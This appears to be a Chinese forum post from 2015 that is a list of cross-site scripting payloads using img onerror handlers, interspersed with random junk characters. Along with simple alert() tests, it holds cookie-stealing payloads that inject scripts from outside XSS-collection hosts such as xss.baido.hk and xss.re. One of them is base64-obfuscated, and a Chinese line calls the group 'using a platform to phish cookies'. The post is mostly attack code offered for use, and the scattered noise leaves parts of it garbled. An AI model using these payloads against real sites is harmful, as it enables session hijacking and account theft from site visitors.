<img src='non-exist.jpg'onerror="alert('xss')">
- T! m# h* c$ N R8 U' @<img src=# onerror=alert(123)>3 |9 U. {1 N/ R1 p. U
<img src=# onerror=alert(document.cookie)>
6 E- O& V3 f2 b% n下面是利用平台钓cookie的
: p2 z# W4 g, ?' E& n7 w2 j) H9 Z <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>; O- }3 R0 p+ m0 i
* v3 D4 g' @5 z5 I" i
$ E) t! x. k* T, o, [; k2 b
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>2 c: V3 w, L5 r$ i+ a
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
# r. {& u f" F" C# b+ C“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>% q5 b# Z' A/ b4 X* R6 v
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
3 U% H: ?( V; a% Q0 |<img src="#">
3 J% T9 |2 m& f/ Q$ |" O9 h<img src="#"> h. R9 c) Y: I( W( c
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>5 D$ [. p( @ m% D5 Z
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
- Q7 a# S4 ]. z1 t<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>( d% w1 q$ c7 Z6 }
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>6 t4 t' }0 s5 B( Z2 W x
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
4 `6 h {, T6 D' J! L; H! Y2 s: T<img src=x width="0" height="0"></img>" ?$ S& i7 y$ F% y
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>/ e2 E( b$ ?# Z, Q
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
( j0 }8 m M1 U' {2 h- _ |
发表于 2015-10-18 14:33:54
收藏
支持
反对